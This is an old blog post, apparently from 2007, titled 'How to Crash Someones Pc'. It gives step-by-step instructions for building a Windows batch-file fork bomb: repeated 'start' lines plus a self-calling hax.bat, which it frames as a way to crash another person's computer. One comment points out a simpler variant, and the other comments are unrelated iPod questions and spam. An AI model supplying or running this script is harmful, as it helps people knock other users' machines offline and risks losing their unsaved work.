Sunday, December 23, 2007

How to Crash Someones Pc

Ok everyone here is a bat.file i have been telling u all about here is one way to crash someones pc.
This Process can also be done with Notebook,notepad, & word pad.

What you do it go to notebook than type in start like this (x8)

start
start
start
start
start
start
start
start

Than save as hax.bat

DO NOT EXIT NOTEBOOK

Then add hax.bat at the end so it look's like this

start
start
start
start
start
start
start
start

hax.bat


Then save and exit it then there you go.

This is wat it should look like. (Screen Shot Below)
hax

3 comments:

Anonymous said...

you dont need it 8 times, only once ;P

Silver MLM said...

How do I get My Ipod Music to a new Empty Library?

sharma said...

i got a new ipod and i cant transfer the music from my old ipod to this new one. my itunes without either plugged in is empty and idk what i have to do to make my old music my original library again.. help?
Herman Miller Aeron